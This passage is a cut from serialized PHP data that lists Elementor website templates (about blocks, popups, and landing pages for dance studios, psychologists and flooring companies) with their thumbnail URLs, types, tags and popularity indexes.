2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_7.png\";s:12:\"tmpl_created\";i:1520443520;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/about-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:214;s:11:\"trend_index\";i:178;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:457;a:14:{s:2:\"id\";i:5480;s:5:\"title\";s:7:\"About 4\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_7-1.png\";s:12:\"tmpl_created\";i:1520443522;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/about-4-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:424;s:11:\"trend_index\";i:417;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:458;a:14:{s:2:\"id\";i:10057;s:5:\"title\";s:48:\"Hello Bar | Register | Subscribe | Gym | Fitness\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2019/01/hello-bar_register_sport_small.png\";s:12:\"tmpl_created\";i:1547847938;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/hello-bar-register-subscribe/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:702;s:11:\"trend_index\";i:674;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:459;a:14:{s:2:\"id\";i:5488;s:5:\"title\";s:7:\"About 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_8.png\";s:12:\"tmpl_created\";i:1520443524;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/about-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:314;s:11:\"trend_index\";i:355;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:460;a:14:{s:2:\"id\";i:5496;s:5:\"title\";s:7:\"About 9\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_8-1.png\";s:12:\"tmpl_created\";i:1520443526;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/about-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:508;s:11:\"trend_index\";i:575;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:461;a:14:{s:2:\"id\";i:5504;s:5:\"title\";s:8:\"About 18\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_9.png\";s:12:\"tmpl_created\";i:1520443528;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-18/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:112;s:11:\"trend_index\";i:161;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:462;a:14:{s:2:\"id\";i:10087;s:5:\"title\";s:25:\"Full Screen | Login | Spa\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2019/01/full-screen_login_spa_small.png\";s:12:\"tmpl_created\";i:1547848301;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/popups/full-screen-login-spa/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:595;s:11:\"trend_index\";i:625;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:463;a:14:{s:2:\"id\";i:14772;s:5:\"title\";s:35:\"Luxury Real Estate &#8211; 404 page\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/07/404.png\";s:12:\"tmpl_created\";i:1595315728;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/luxury-real-estate-404-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:34:\"[\"404\",\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:728;s:11:\"trend_index\";i:626;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:464;a:14:{s:2:\"id\";i:5515;s:5:\"title\";s:8:\"About 19\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_9.png\";s:12:\"tmpl_created\";i:1520443530;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-19/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:275;s:11:\"trend_index\";i:280;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:465;a:14:{s:2:\"id\";i:10097;s:5:\"title\";s:37:\"Classic | Register | Subscribe | Lego\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2019/01/classic_lego_small.png\";s:12:\"tmpl_created\";i:1547848411;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/classic-register-subscribe-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:633;s:11:\"trend_index\";i:632;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:466;a:14:{s:2:\"id\";i:14779;s:5:\"title\";s:33:\"Luxury Real Estate &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/07/Footer.png\";s:12:\"tmpl_created\";i:1595315743;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/luxury-real-estate-footer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:37:\"[\"footer\",\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:666;s:11:\"trend_index\";i:263;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:467;a:14:{s:2:\"id\";i:1190;s:5:\"title\";s:26:\"Landing Page &#8211; Hotel\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/03/lp2-l.png\";s:12:\"tmpl_created\";i:1490707391;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/landing-page-hotel/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:3;s:11:\"trend_index\";i:1;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:468;a:14:{s:2:\"id\";i:9816;s:5:\"title\";s:30:\"Classic | Sale | Gym | Fitness\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2019/01/classic_sale_sport_small.png\";s:12:\"tmpl_created\";i:1547991876;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/popups/classic-sale-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:655;s:11:\"trend_index\";i:0;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:469;a:14:{s:2:\"id\";i:9602;s:5:\"title\";s:35:\"Bottom Bar | Announcement | Cookies\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2019/01/Bottombar_Announcement_small_01.png\";s:12:\"tmpl_created\";i:1546964559;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/popups/bottom-bar-announcement-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:560;s:11:\"trend_index\";i:663;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:470;a:14:{s:2:\"id\";i:225;s:5:\"title\";s:27:\"Homepage &#8211; Restaurant\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0016.png\";s:12:\"tmpl_created\";i:1470829872;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/homepage-restaurant/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Homepage\",\"Restaurant\"]\";s:10:\"menu_order\";i:2;s:16:\"popularity_index\";i:1;s:11:\"trend_index\";i:3;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:471;a:14:{s:2:\"id\";i:463;s:5:\"title\";s:22:\"Homepage &#8211; Study\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0022.png\";s:12:\"tmpl_created\";i:1477388340;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/homepage-study/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Education\",\"Homepage\",\"Study\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:5;s:11:\"trend_index\";i:4;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:472;a:14:{s:2:\"id\";i:10277;s:5:\"title\";s:36:\"Bottom Bar | Promotion | Sale | Book\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/book_small.png\";s:12:\"tmpl_created\";i:1548055999;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/bottom-bar-promotion-book/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:674;s:11:\"trend_index\";i:654;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:473;a:14:{s:2:\"id\";i:11241;s:5:\"title\";s:36:\"Classic | Digital Agency | Marketing\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/07/PopUp_small.jpg\";s:12:\"tmpl_created\";i:1564643043;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-digital-agency-marketing/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:370;s:11:\"trend_index\";i:311;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:474;a:14:{s:2:\"id\";i:181;s:5:\"title\";s:23:\"Homepage &#8211; Agency\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0019.png\";s:12:\"tmpl_created\";i:1470826567;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/homepage-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Agency\",\"Creative\",\"Homepage\"]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:2;s:11:\"trend_index\";i:2;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:475;a:14:{s:2:\"id\";i:9903;s:5:\"title\";s:34:\"Bottom Bar | Promotion | Olive Oil\";s:9:\"thumbnail\";s:93:\"https://library.elementor.com/wp-content/uploads/2019/01/bottom-bar_promotion_olive_small.png\";s:12:\"tmpl_created\";i:1547838896;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/popups/bottom-bar-promotion/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:705;s:11:\"trend_index\";i:712;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:476;a:14:{s:2:\"id\";i:150;s:5:\"title\";s:19:\"Product &#8211; App\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0003.png\";s:12:\"tmpl_created\";i:1470829879;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/product-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:5;s:16:\"popularity_index\";i:6;s:11:\"trend_index\";i:5;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:477;a:14:{s:2:\"id\";i:15317;s:5:\"title\";s:25:\"Dance Studio &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/10/Home.jpg\";s:12:\"tmpl_created\";i:1603181291;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/dance-studio-home/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"dance studio\"]\";s:10:\"menu_order\";i:6;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:478;a:14:{s:2:\"id\";i:10549;s:5:\"title\";s:33:\"Bottom Bar | Register | Subscribe\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/com_small.png\";s:12:\"tmpl_created\";i:1547967595;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/popups/bottom-bar-register-subscribe/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:6;s:16:\"popularity_index\";i:661;s:11:\"trend_index\";i:671;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:479;a:14:{s:2:\"id\";i:15334;s:5:\"title\";s:26:\"Dance Studio &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/10/About.jpg\";s:12:\"tmpl_created\";i:1603181364;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/dance-studio-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"dance studio\"]\";s:10:\"menu_order\";i:7;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:480;a:14:{s:2:\"id\";i:15349;s:5:\"title\";s:28:\"Dance Studio &#8211; Classes\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/10/Classes.jpg\";s:12:\"tmpl_created\";i:1603181425;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/dance-studio-classes/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"dance studio\"]\";s:10:\"menu_order\";i:8;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:481;a:14:{s:2:\"id\";i:15366;s:5:\"title\";s:29:\"Dance Studio &#8211; Schedule\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2020/10/Classes-Schedule.jpg\";s:12:\"tmpl_created\";i:1603181056;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/dance-studio-schedule/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"dance studio\"]\";s:10:\"menu_order\";i:9;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:482;a:14:{s:2:\"id\";i:10529;s:5:\"title\";s:36:\"Classic | Announcement | Maintenance\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/icon_small.png\";s:12:\"tmpl_created\";i:1548046309;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/popups/classic-announcement/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:9;s:16:\"popularity_index\";i:452;s:11:\"trend_index\";i:408;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:483;a:14:{s:2:\"id\";i:15373;s:5:\"title\";s:28:\"Dance Studio &#8211; Pricing\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/10/Pricing.jpg\";s:12:\"tmpl_created\";i:1603181678;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/dance-studio-pricing/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"dance studio\"]\";s:10:\"menu_order\";i:10;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:484;a:14:{s:2:\"id\";i:15384;s:5:\"title\";s:28:\"Dance Studio &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/10/Contact-Us.jpg\";s:12:\"tmpl_created\";i:1603181738;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/dance-studio-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"dance studio\"]\";s:10:\"menu_order\";i:11;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:485;a:14:{s:2:\"id\";i:15158;s:5:\"title\";s:26:\"Psychologist &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/09/About.jpg\";s:12:\"tmpl_created\";i:1600157561;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/psychologist-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:12;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:486;a:14:{s:2:\"id\";i:15197;s:5:\"title\";s:28:\"Psychologist &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/09/Contact-Us.jpg\";s:12:\"tmpl_created\";i:1600160499;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/psychologist-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:13;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:487;a:14:{s:2:\"id\";i:15142;s:5:\"title\";s:25:\"Psychologist &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/09/Home.jpg\";s:12:\"tmpl_created\";i:1600156308;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/psychologist-home/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:14;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:488;a:14:{s:2:\"id\";i:15188;s:5:\"title\";s:28:\"Psychologist &#8211; Pricing\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/09/Pricing.jpg\";s:12:\"tmpl_created\";i:1600159731;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/psychologist-pricing/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:15;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:489;a:14:{s:2:\"id\";i:15167;s:5:\"title\";s:29:\"Psychologist &#8211; Services\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/09/Services.jpg\";s:12:\"tmpl_created\";i:1600158206;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/psychologist-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:16;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:490;a:14:{s:2:\"id\";i:14932;s:5:\"title\";s:30:\"Flooring Company &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/08/About.png\";s:12:\"tmpl_created\";i:1597740110;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/flooring-company-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:642;s:11:\"trend_index\";i:102;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:491;a:14:{s:2:\"id\";i:10413;s:5:\"title\";s:28:\"Classic | Content Lock | Pop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/hot_small.png\";s:12:\"tmpl_created\";i:1547961774;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/popups/classic-content-lock/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:687;s:11:\"trend_index\";i:680;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:492;a:14:{s:2:\"id\";i:14998;s:5:\"title\";s:32:\"Flooring Company &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/08/Contact-Us.png\";s:12:\"tmpl_created\";i:1597740222;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/flooring-company-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:18;s:16:\"popularity_index\";i:676;s:11:\"trend_index\";i:116;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:493;a:14:{s:2:\"id\";i:10223;s:5:\"title\";s:15:\"Classic | Login\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/01/welcome_small.png\";s:12:\"tmpl_created\";i:1547887343;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/popups/classic-login-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:471;s:11:\"trend_index\";i:437;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:494;a:14:{s:2:\"id\";i:14965;s:5:\"title\";s:32:\"Flooring Company &#8211; Gallery\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/08/Gallery.png\";s:12:\"tmpl_created\";i:1597740353;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/flooring-company-gallery/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:608;s:11:\"trend_index\";i:57;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:495;a:14:{s:2:\"id\";i:10559;s:5:\"title\";s:33:\"Bottom Bar | Register | Subscribe\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/fly_small.png\";s:12:\"tmpl_created\";i:1547967711;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/popups/bottom-bar-register-subscribe-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom 